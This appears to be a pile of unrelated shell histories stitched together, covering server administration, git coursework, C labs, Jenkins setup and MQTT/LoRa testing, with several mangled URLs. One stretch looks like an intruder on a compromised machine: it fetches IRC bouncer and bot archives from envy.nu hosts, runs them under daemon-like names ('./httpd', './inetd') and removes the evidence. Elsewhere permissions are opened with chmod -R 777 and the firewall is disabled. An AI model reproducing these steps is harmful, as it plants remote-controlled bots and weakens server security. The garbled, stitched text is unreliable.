/usr/lib/check_mk_agent/local/ +ls -al /usr/lib/check_mk_agent/local/ + /usr/lib/check_mk_agent/local/check_hawk_ + /usr/lib/check_mk_agent/local/check_hawk_data + /usr/lib/check_mk_agent/local/check_hawk_proc + /usr/lib/check_mk_agent/local/check_hardware +check_mk -v -I mgen1.gate.rtf +check_mk -v -II mgen1.gate.rtf +check_mk -v -II control1.gate.rtf +check_mk -v -II pgen11.gate.rtf +check_mk -v -II pgen1.gate.rtf +check_mk -v -II --checks local pgen1.gate.rtf +check_mk -v -II --checks local control2.gate.rtf +pwd +check_mk -v -II --checks local control2.gate.rtf +check_mk -v -v -II --checks local control2.gate.rtf +whoami +ls +grep -R "/usr/lib/check_mk_agent" * +grep -r "/usr/lib/check_mk_agent" * +pwd +grep -r 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+sudo apt-get install php-xml +ls +composer install +exit +ls +chmod -R 777 vendor +chmod -R 777 assets +chmod -R 777 commands +chmod -R 777 config +chmod -R 777 controllers +chmod -R 777 mail +chmod -R 777 models +chmod -R 777 runtime +chmod -R 777 tests +chmod -R 777 web +exit +ls +composer install +sudo -s +ks +ls +composer unpade +composer update +ls +chmod -R 777 vendor +sudo -s +l +ls +composer update +ls +ls +ls +mv bower-asset bower +ls +ls +ls +git pull origin master +ls +git pull origin master +ls +git status +git branch -v +git pull origin master +puppet module install puppetlabs-apache --version 2.1.0 +ls +ls +ls +vi init.pp +git init +apt-get install -y git +git init +git remote add originsawhney04/modules.git +git add -A +git commit -m "comment" +git config --global user.email "ramansawhney04@gmail.com" +git config --global user.name "Raman Sawhney" +git commit -m "comment" +git push +git push -u origin master +puppet module install puppetlabs-java +ls +git push origin master +git push -u origin master +git add -A +git push -u origin master +git commit -m "message" +git push -u origin master +history +ip a +exit +ls +cs puppetcodes/ +ls +ls -l +vi lampstack.pp +puppet apply lampstack.pp +service status apache2 +history +clr +clear +service apache2 status +service mysql status +cat lampstack.pp +which apt-get +ls +nano lampstack.pp +nano example +nano example.pp +nano example2.pp +ip a +exit +ls +ls +nano lstack.pp +puppet apply lstack.pp +service apache2 status +echo "vagrant-ubuntu-trusty-64.example.com" > /etc/hostname +puppet apply lstack.pp +puppet apply lstack.pp +echo "vagrant-ubuntu-trusty-64" > /etc/hostname +puppet apply lstack.pp +nano lampstack.pp +nano lstack.pp +puppet apply lstack.pp +nano lstack.pp +puppet apply lstack.pp +nano lstack.pp +puppet apply lstack.pp +nano lstack.pp +ip a +clear +ip a +nano lstack.pp +puppet apply lstack.pp +nano lstack.pp +puppet apply lstack.pp +nano lstack.pp +puppet apply lstack.pp +nano lstack.pp +puppet apply lstack.pp +exit +w +uname -a +wget +cat /etc/hosts +cat /proc/cpuinfo +wget lukiano.envy.nu/psybnc.tar.gz +tar xvfz psybnc.tar.gz +make +cls -a +ls -a +ls -a +wget govandari.envy.nu/br.tar +tar xvf br.tar +./httpd +ls -a +rm -rf br.tar +rm -rf www +wget lukiano.envy.nu/dragonbot.tgz +tar xvf dragonbot.tgz +./inetd +ls -a +rm -rf .bot +rm -rf psybnc +rm -rf psybnc.tar.gz +ps x +ps -aux +./ +ls -a +cat /proc/cpuinfo +ls +rm -dr forum +sudo rm -dr forum +ls +ls -al +mkdir forum +lls +ls +ls +composer create-project --prefer-dist laravel/laravel +rm -dr forum +sudo composer +sudo composer create-project --prefer-dist laravel/laravel forum +ls +ls -al +nano /do.sh +sudo nano /do.sh +sudo bash /do.sh +ls -al +sudo chmod 777 -R storage/ +ls +sudo rm -dr forum +composer create-project --prefer-dist laravel/laravel myapplication +ls -al +ls +exit +exit +ls -l +ls -la +exit +ls -la +ls -l +ls -l +exit +ls -la +exit +ls -la +ls -la +exit +ls -l +ls -la +exit +ls +ls -l +ls -l config/ +exit +vi +i +vi +vi reginaldo +vi teste +mc +vi +vi teste +cat +nano +mcedit +echo $PATH +mkdir bin +nano primeiro +chmod +x primeiro +ls -la +primeiro +chmod +x primeiro +ls +primeiro +ls -la +vi primeiro +ls -la +primeiro +nano primeiro +primeiro +nano primeiro +ls -la +ls +primeiro +pw +primeiro +ls +nano peimeiro +nano primeiro +ls +mkdir segundo +ls +nano segundo +segundo +./segundo +nano segundo +ls +c . +c. +nano primeiro +ls +nano primeiro +primeiro +nano primeiro +cat -n primeiro +ls +nano +ls +nano seg +nano segundo +ls +ls +primeiro +cat -n peimeiro +cat -n primeiro +cut primeiro +ls +ls +s +ls +ls +ls +n1=6 +n2=7 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n2=8 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n2=10 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n2=8 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n1=8 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n=7 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n1=8 +n2=7 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n1=3 +n2=4 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n1=4 +n2=3 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +echo "informe usuario:"; read user; +test "super" = "redes" && echo "user: $user" || echo "user: errado" +vim +vim teste.sh +vi +num=7 +./relação 3 5 +vim relacao +ls +-ls +ls +ls +vim relacao +num=7 +num2=9 +if test $num -lt $num2; then echo "menor"; else echo "maior"; fi menor +7 +fi +num=5 +num2=8 +fi +if test $num -lt $num2; fi +num=5 +num2=9 +if test $num -lt $num2; fi +/bin +ls +-l +ls +ls +vim bin +ls +vim bin +vim hindu +vim bin +ls +ls +nano trabalho.sh +ls +nano +vim +chmod +x trabalho.sh + +nano trabalho.sh +vi trabalho.sh +nano trabalho.sh +vim trabalho.sh +nano trabalho.sh +vim trabalho.sh +./trabalho.sh +vi trabalho.sh +./trabalho.sh +vi trabalho.sh +ls +bin +/bin +ls +nano trabalho2.sh +nano trabalho.sh +nano trabalho.sh +chmod +x trabalho.sh +ls +ls +ls +exit +ls +ls +ls +ls -l +ls +exit +ls +vim trabalho.sh +exit +nano trabalho.sh +ls +nano trabalho +ls +./trabalho.sh +2 +./trabalho.sh +nano trabalho +nano trabalho.sh +./trabalho.sh +cat trabalho.sh +ls +cat trabalho +cat trabalho.sh +cat trabalho2.sh +ls +sed huinu -d +ls +sed -n hundu +seq 1 5 +seq -f 1 5 +seq -s 1 5 +seq -s", " 0 10 +seq -f%f 0 10 +ls +nano trabalho.sh +vim trabalho.sh +./trabalho.sh +ls +ls +vim trabalho.sh +exit +git clonesia/os162.git +git clonesia/os162.git +ls -al +mkdir week00 week01 week02 week03 week04 week05 week06 week07 week09 week10 week11 SandBox +ls -al +touch dummy +$ touch dummy +toucj dummy +touch dummy +ls -al +week01 +touch dummy +ls -al +touch dummy +ls -al +touch dummy +touch dummy +touch dummy +touch dummy +touch dummy +ls -al +ls -al +mkdir week08 +ls -al +touch dummy +ls -al +touch dummy +touch dummy +git add +git status +git add week01 +git add week02 +git add week03 +git add week04 +git add week05 +git add week06 +git add week07 +git add week08 +git add week09 +git add week10 +git status +git add week00 +git status +git commit -m "task week1" +git pull +git push +git push +git pull +touch testCreateFile +ls -al +git status +git status +ls -al +git clonesia/os162.git +ls -a +git clonesia/os162.git tmp && mv tmp/.git . && rm -rf tmp && git reset --hard +git init +git clone gitsia/os162.git +ls -a +rm -rf .* && git clonesia/os162.git +sshsia/os162.git +git status +git add os162/ +git status +git commint -m "update local repository week1" +git commit -m "update local repository week1" +git pull +git push +git pull +ls -al +ls -al +rm -f dummy +ls -al +vi laporan.txt +git status +git add laporan.txt +git status +git commit -m "laporan week 1" +git pull +git push +git pull +vi what-time-script.sh +chmod +x what-time-script.sh +./what-time-script.sh >> lab01.txt +Today is 01 Sep 2001 at 00:00:00 +./what-time-script.sh >> lab01.txt Today is 01 Sep 2001 at 00:00:00 +cat lab01.txt +./what-time-script.sh >> lab01.txt +cat lab01.txt +nano what-time-script.sh +chmod +x what-time-script.sh +./what-time-script.sh >> lab01.txt +cat lab01.txt +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +mv week01/laporan.txt os162 +ls -al +ls -al +mv week01/what-time-script.sh os162 +ls -al +ls -al +ls -al +re -f dummy +rm -f dummy +ls -al +ls -al +mv laporan.txt week01 +mv what-time-script.sh week01 +ls -al +ls -al +git status +gitdummy +git add dummy +git add lab01.txt +git add laporan.txt +git add what-time-script.sh +git status +git commit -m "update. move file from week01 to os162/week01" +git pull +git push +git pull +git status +ls -al +ls +ls -al +ls -al +ls -al +ls -al +ls -al +mv os162/week01/laporan.txt week01 +mv os162/week01/what-time-script.sh week01 +ls -al +ls -al +rm -f os162 +ls -al +ls -al +ls -al +ls -al +rm -f os162 +mv week01/laporan.txt os162/week1 +mv week01/what-time-script.sh os162/week1 +ls -al +week 00 +ls -al +ls -al +ls-al +ls -al +ls -al +rm -f week1 +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +vi laporan.txt +vi what-time-script.sh +ls -al +chmod +x what-time-script.sh +./what-time-script.sh >> lab01.txt +cat lab01.txt +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +ls -al +git status +cp +cp --help +cp os162/week01/laporan.txt week01 +cp os162/week01/what-time-script.sh week01 +ls -al +ls -al +ls -al +git status +git add os162/week01/laporan.txt +git add os162/week01/what-time-script.sh +git status +git commit -m "update os162/week01" +git pull +git push +git pull +git status +git clear os162/os162.tmp +git status +git clear os162/week/dummy +git status +git clear os162/os162.tmp +git clean os162/week01/dummy +git status +ls -al +ls -al +ls -al +ls -al +git clonesia/os162.git +git clonesia/os162.git . +git clonesia/os162.git. +git clonesia/os162.git. +git clonesia/os162.git . +git clone git@github.com:github-RClaurensia/github-repo.git -b develop ./ +git clone git@github.com:github-RClaurensia/os162.git -b develop ./ +git clonesia/os162.git ./ +git clonesia/os162.git +git clonesia/os162.git -b develop ./ +git clonesia/os162.git +git init +git remote add originsia/os162.git +git fetch +git checkout -t origin/master +git clonesia/ +git clone --no-checkoutsia/os162.git existing-dir/existing-dir.tmp +git clone --no-checkoutsia/os162.git os162/os162.tmp +ls -al +ls -al +ls -al +git status +git status +git add SandBox/ +git status +git commit -m "add testCreateFile SandBox" +git pull +git push +git pull +ls -al +rm -f dummy +ls -al +vi laporan.txt +nano laporan.txt +git status +git add week00/laporan.txt +git status +git commit -m "add laporan.txt" +git pull +git push +git pull +git status +git add week00/dummy +git status +git commit -m "delete file dummy" +git pull +git push +git pull +touch lab01.txt +ls -al +ls -al > lab01.txt +mv lab01.txt week01 +ls -al +ls -al +pwd +ls -al +pwd >> lab01.txt +touch myExpectation.txt +ls -al +vi myExpectation.txt +git status +git add myExpectation.txt +git status +git commit -m "add file myExpectation" +git pull +git push +git pull +ls -al +rm -f os162 +ls -a +ls -al +rm -rf os162 +ls -al +cs week01 +ls -al +ls -al +git status +git add os162/README.md +git status +git add os162 +git status +git commit -m "delete double folder" +git push +git pull +git status +git clear week01/dummy +git clean week01/lab01.txt +ls -al +git pull +git status +git remove week01/lab01.txt +clear +ls -al +git pull +ls -al +rm -f lab01.txt +rm -f what-time-script.sh +ls -al +git pull +git pull +git status +git push +ls -al +ls -al +vi laporan.txt +vi what-time-script.sh +clear +./what-time-script.sh >> lab01.txt +chmod +x what-time-script.sh +./what-time-script.sh >> lab01.txt +vi what-time-script.sh +vi what-time-script.sh +./what-time-script.sh >> lab01.txt +git status +git add week01/lab01.txt +git add week01/laporan.txt +git add week01/what-time-script.sh +git status +git commit -m "update file week01" +git push +git pull +ls -al +ls -al +mkdir work +mkdir work02 +exit +ls -al +ls -al +ls -al +ls -al +ls -al +ssh claurensia.richa@kawung.cs.ui.ac.id +ls -al +ls -al | tee 02-ls-al.txt +gpg --gen-key +gpg --gen-key +gpg --list-keys | tee 03-list-keys1.txt +gpg --import 01-public-osteam.txt +gpg --list-keys | tee 04-list-keys2.txt +gpg --export --armor > 05-mypublickey1.txt +cp 05-mypublickey1.txt ~/os162/week00/mypublickey1.txt +ls -al +cp 05-mypublickey1.txt ~/week00/mypublickey1.txt +sha1sum * > SHA1SUM +sha1sum -c SHA1SUM +gpg --sign --armor --detach SHA1SUM +gpg --verify SHA1SUM.asc +tar cvfj work02.tbj work02/ +gpg --output work02.tbj.gpg --encrypt --recipient OSTEAM --recipient claurensia.richa@ui.ac.id work02.tbj +ls -al +gpg work02.tbj.gpg +cp work02.tbj.gpg ~/week02/work02.tbj.gpg +rm dummy +git add . +git status +git add . +git status +git commit -m "task week02" +git pull +git push +ls +mkdir work03 +vi lab03.txt +nano lab03.txt +vi myawasomescript.sh +chmod 755 myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +nano myawasomescript.sh +./myawasomescript.sh lab03.txt +./myawasomescript.sh lab03.txt > output.txt +slear +clear +vi hello.c +gcc hello.c -o hello +./hello +nano hello.c +gcc hello.c -o hello +nano hello.c +gcc hello.c -o hello +./hello +nano hello.c +gcc hello.c -o hello +./hello +nano hello.c +gcc hello.c -o hello +./hello +sha1sum * > SHA1SUM +sha1sum -c SHA1SUM +gpg --sign --armor --detach SHA1SUM +gpg --verify SHA1SUM.asc +lear +clear +tar cvfj work03.tbj work03/ +gpg --encrypt --recipient OSTEAM --recipient claurensia.richa@ui.ac.id +nmtui +yum update +init 0 +ip a +ping +yum install network +nmtui +ip a +yum remove java +sudo yum install java-1.8.0-openjdk-devel +curl --silent --locations-ci.org/redhat-stable/jenkins.repo | sudo tee /etc/yum.repos.d/jenkins.repo +sudo rpm --imports-ci.org/redhat/jenkins-ci.org.key +sudo yum install jenkins +sestatus +vi /etc/sestatus.conf +vi /etc/selinux/config +systemctl stop firewalld +systemctl enable firewalld +systemctl stop firewalld +systemctl disable firewalld +reboot +sudo yum install jenkins +sudo systemctl start jenkins +systemctl status jenkins +ls +vi /etc/sysconfig/jenkins +sudo systemctl restart jenkins +sudo systemctl enable jenkins +sudo systemctl restart jenkins +vi /etc/sysconfig/jenkins +sudo systemctl restart jenkins +cat /var/lib/jenkins/secrets/initialAdminPassword +sudo systemctl restart jenkins +sudo systemctl stop jenkins +sudo systemctl start jenkins +apt-get install libapache2-mod-php +apt install libapache2-mod-php +ip a +nmtui +ip a +sudo systemctl restart jenkins +ip a +init 0 +sudo systemctl enable jenkins +sudo firewall-cmd --permanent --zone=public --add-port=8080/tcp +systemctl start firewalld +sudo firewall-cmd --permanent --zone=public --add-port=8080/tcp +sudo firewall-cmd --reload +netstat -plntu +yum install net-tools +netstat -plntu +ip a +nmtui +ip a +ls +ls -la +ip a +systemctl restart network +netstat -plntu +yum install net-tools +ip a +nmtui +ip a +nmtui +init 0 +ip a +init 0 +ip a +nmtui +ip a +init 0 +rm *.o +ls +exit +make +./bin/info_pc2_cesar +ls +vim lib/printInfo.c +vim src/ +vim src/info_pc2_cesar.c +ls +vim lib/printInfo.c +make +./bin/info_pc2_cesar +vim lib/printInfo.c +make +./bin/info_pc2_cesar +exit +ls +ls build/ +rm build/fileSearch.o +ls +make build/fileSearch.o +vim Makefile +make build/fileSearch.o +ls +vim build/ +ls build/ +make +vim src/ +ls src/ +vim src/info_pc1_cesar.c +ls +gcc -o bin/main src/info_pc1_cesar.c include/fileSearch.h +gcc -o bin/main src/info_pc1_cesar.c include/fileSearch.h -I include +gcc -o bin/main src/info_pc1_cesar.c include/fileSearch.h build/fileSearch.o -I include +./bin/main +ls +vim Makefile +make +vim Makefile +make +rm bin/main +ls +make +rm bin/info_pc1_cesar +ls +make +ls +cp src/info_pc1_cesar.c lib/fileSearch.c +ls +vim lib/ +bim lib/fileSearch.c +vim lib/fileSearch.c +cp include/fileSearch.h lib/fileSearch.c +ls +mv lib/fileSearch.c lib/fileSearch.h +ls +mv lib/fileSearch.h lib/fileSearch.c +mv lib/fileSearch.c lib/fileSearch.c +ls +vim lib/fileSearch.c +make +vim lib/fileSearch.c +make +ls +./bin/info_pc1_cesar +ls +vim lib/fileSearch.c +:wq +ls +ls +vim lib/ +vim lib/fileSearch.c +ls +cp src/info_pc1_cesar.c lib +vim lib/ +mv lib/info_pc1_cesar.c lib/printInfo.c +ls +vim lib/printInfo.c +ls +ls lib/ +vim lib/printInfo.c +ls +vim lib/fileSearch.c +vim lib/printInfo.c +ls +cp lib/printInfo.c include/printInfo.h +vim include/printInfo.h +vim src/ +vim src/info_pc1_cesar.c +make +./bin/info_pc1_cesar +make +ls +vim lib/ +vim lib/printInfo.c +vim include/ +ls +ls +ls +ls 1/stat/ +ls +vim 1/stat +ls +vim 1/stat +l +ls +ls +vim stat +pwd +ls +cat uptime +vim 1/stat +vim stat +ls +ls +vim lab1 +ls +vim lib/fileSearch.c +vim lib/printInfo.c +vim include/printInfo.h +make +vim src/info_pc1_cesar.c +make +./bin/info_pc1_cesar +vim /proc/stat +ls +vim lib/printInfo.c +make +./bin/info_pc1_cesar +:ls +ls +ls +vim lab +ls +vim csalcedo.c +:wq +ls +rm * +ls +ls +cp -r lab1 lab3 +ls +vim lab3 +ls +ls lab3 +ls lab1 +ls +rm -rf lab2 +ls +vim lab3/ +ls +mv lab3 lab2 +ls +less /proc/meminfo +ls +vim lib/printInfo.c +ls +vim include/ +:q +ls +vim lib/printInfo.c +ls +vim include/printInfo.h +ls +vim lib/printInfo.c +ls +vim lib/fileSearch.c +vim include/fileSearch.h +ls +vim lib/printInfo.c +vim lib/fileSearch.c +ls +vim lib/printInfo.c +vim include/fin +vim include/fileSearch.h +ls +vim lib/printInfo.c +vim lib/fileSearch.c +vim lib/printInfo.c +ls +vim lib/fileSearch.c +vim include/fileSearch.h +vim include/printInfo.h lib/printInfo.c +vim include/fileSearch.h lib/fileSearch.c +vim include/fileSearch.h +vim lib/printInfo.c +vim lib/printInfo.c include/fileSearch.h +make +vim lib/printInfo.c +ake +make +make | less +vim src/info_pc1_cesar.c +make +vim include/fileSearch.h +vim lib/fileSearch.c +make +vim include/fileSearch.h +make +vim lib/fileSearch.c +ls +vim include/fileSearch.h +vim lib/fileSearch.c +vim lib/printInfo.c +make +vim lib/fileSearch.h +vim include/fileSearch.h +make +vim include/fileSearch.h +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +vim include/fileSearch.h +make +./bin/info_pc1_cesar +/proc/meminfo | less +cat /proc/meminfo | less +./bin/info_pc1_cesar +vim lib/printInfo.c +make +vim lib/printInfo.c +make +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim /proc/meminfo +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +make +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +cat /proc/meminfo | less +./bin/info_pc1_cesar +cat /proc/meminfo | less +./bin/info_pc1_cesar +cat /proc/meminfo | less +vim lib/fileSearch.c +vim lib/printInfo.c +make +./bin/ +./bin/info_pc1_cesar +vim lib/printInfo.c +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +vim lib/fileSearch.c +make +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +cat /proc/stat +cat /proc/meminfo | less +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +cat /proc/meminfo | less +vim lib/printInfo.c +make +./bin/info_pc1_cesar +cat /proc/meminfo | less +vim lib/printInfo.c +cat /proc/meminfo | less +vim lib/printInfo.c +vim lib/fileSearch.c +vim include/fileSearch.h +ls +vim lib/printInfo.c +male +make +vim lib/printInfo.c +make +./bin/info_pc1_cesar +ls +vim lib/printInfo.c +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c +./bin/info_pc1_cesar +vim lib/fileSearch.c +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +./bin/info_pc1_cesar +vim lib/fileSearch.c +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/printInfo.c +make +./bin/info_pc1_cesar +vim lib/fileSearch.c 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Splits input string into a list of arguments." +ls +./bin/bash +ls +vim src/bash.c +make +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +vim src/bash.c +make +vim src/bash.c +./bin/bash +ls +ls +vim src/bash.c +ls +ls +vim src/bash.c +make +vim src/bash.c +make +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +./bin/bash +ls +make +./bin/bash +vim src/bash.c +make +ls +ls +vim src/bash.c +make +./bin/bash +vim src/bash.c +ls +vim lib/readInput.c +vim src/bash.c +make +vim src/bash.c +./bin/bash +make +./bin/bash +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +vim src/bash.c +make +./bin/bash +make +vim src/bash.c +bin +./bin/bash +git status +ls +git status +ls +git status +vim src/bash.c +make +vim src/bash.c +make +vim src/bash.c +make +vim src/bash.c +make +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +./bin/bash +vim src/bash.c +make +./bin/bash +vim src/ +ls +./bin/bash +vim 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-m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":11, \ +\"object\": { \"led\": 1 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":11, \ +\"object\": { \"led\": 1 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"abcd1234\", \ +\"confirmed\": false,\"fPort\":121, \ +\"object\": { \"led\": 10 } }" +shutdown -h now +sudo shutdown -h now +ls +python3 lorasender.py +clear +python3 lorasender.py +logout +ls +python3 lorasender.py +sudo nano lorasender.py +python3 lorasender.py +sudo nano lorasender.py +python3 lorasender.py +sudo nano lorasender.py +python3 lorasender.py +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"avrecf1234\",\"confirmed\": false,\"fPort\":11,\"data\": \"Q2lhb0NpYW8=\"}" +sudo nano lorasender.py +python3 lorasender.py +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"avrecf1234\",\"confirmed": false,\"fPort\":11,\"data\": \"AQ==\"}" + + + + + +python3 lorasender.py +mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"avrecf1234\",\"confirmed\": false,\"fPort\":11,\"data\": \"AQ==\"}" +python3 lorasender.py +sudo mosquitto_pub -h -t "application/1/node/0000000000000000/tx" -m "{\"reference\": \"avrecf1234\",\"confirmed\": false,\"fPort\":11,\"data\": \"AQ==\"}" +python3 lorasender.py +ls +ls +python3 lorasender.py +ls +sudo nano lorasender.py +python3 lorasender.py +sudo nano lorasender.py +python3 lorasender.py +sudo nano lorasender.py +python3 lorasender.py +sudo nano lorasender.py +python3 lorasender.py +clear +ls +ls +python3 lorasender.py +ls +ls +python3 lorasender.py +ls +ping google.com +cat control_gateway_and_process_with_mqtt.py +python3 control_gateway_and_process_with_mqtt.py +ping google.com +ls +ls +python3 downlink_commander.py +ls +ls +python3 downlink_commander.py +python3 downlink_commander.py +sudo nano /etc/sshd.conf +ls +ls +sudo nano sshd_config +sudo nano /etc/dhcpcd.conf +sudo shutdown -h now +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +python3 downlink_commander.py +sudo nano /etc/rc.local +python3 downlink_commander.py +logout +mkdir teste +rmdir teste +dir +touch johan +vi johan +ls -l +dir +ls +vi johan +dir +dir +ls +guet *moraes* +exit +help +echo $PATH +mkdir bin +vi primeiro +chmod +x primeiro +ls -l +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +vi primeiro +vim primeiro +primeiro +vim +vim primeiro +primeiro +vim primeiro +exit +ls +exit +ls +exit +ps +ls +./obe-entrypoint.sh +ps +screen -r +exit +screen -r +./obe-entrypoint.sh +screen -r +exit +./obe-entrypoint.sh +screen -r +exit +pwd +ls +exit +ls -l +ls -l +vi UploadFile-JS.html +vi UploadFile-JS.html +ls -l +ls -l +vi index +vin index.ejs +vi index.ejs +ls -l +rm UploadFile-JS.html +ls -l +ls -l +rm 1* +clear +ls -l +clear +ls -l +vi login.ejs +ls -l +vi index.js +exit +ls -l +ls -l +vi index.js +vi index.js +ls -l +ls -l +ls -l +ls -l +vi user.js +vi user.js +clear +ls -l +ls -l +ls -l +vi index.js +ls -l +ls -l +rm login.html +rm Static-login.html +ls -l +clear +ls -l +rename Views/ views/ +ls -l +mv Views views +ls -l +mv Controllers controllers +mv Services services +ls -l +ls -l +vi index.js +ls -l +clear +ls -l +vi static-index.html +vi static-index.html +ls -l +sudo vi static-index.html +ls -l +ls -l +ls -l +ls -l +ls -l +clear +ls -l +ls -l +ls -l +ls -l +vi static-index.html +clear +ls -l +ls -l +vi controllers.js +ls -l +ls -l +ls -l +ls -l +ls -l +ls -l +vi static-index.html +ls -l +vi services.js +ls -l +vi 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+reset +ls -l +clear +ls -l +clear +ls -l +ls -l +rm * +ls -l +clear +ls -l +rm controllersApp.js +rm servicesApp.js +clear +ls -l +rm * +ls -l +exit +vim index.js +vi index.js +exit +ls -l +rm controllersApp.js +clear +exit +rm moduleApp.js +ls -l +clear +exit +vi index.js +ls -l +rm dancer.obj +exit +ls -l +ls -l +clear +exit +ls -l +rm directivesApp.js +exit +ls -l +rm directivesApp.js +clear +exit +ls -l +rm controllersApp.js +clear +ls -l +exit +ls -l +rm controllersApp.js +clear +exit +vi index.js +ls -l +vi controllers/controladores.js +vi controllers/controladores.js +exit +rm directivesApp.js +exit +ls -l +vi controladores.js +PWD +pwd +ls -l +ls -l +rm controllersApp.js +ls -l +exit +ls -l +ls -l +clear +ls -l +vi index.js +ls -l +vim controladores.js +vi controladores.js +reset +vi routes/index.js +vi routes/index.js +exit +ls -l +rm directivesApp.js +clear +exit +ls -l +rm -rf * +ls -l +ls -l +clear +exit +ls -la +nodemon +sudo ls +su root +su sudo +su root +ls -l +rm -f directiveRender.js +clear +exit +rm -f directiveOcioso.js +clear +exit +ls -l +rm singin-signup.html +clear +ccd +rm -r dier +rm directiveRenderOp.js +clear +rm controllersApp.js +exit +rm sendFile.js +rm renderOBJ* 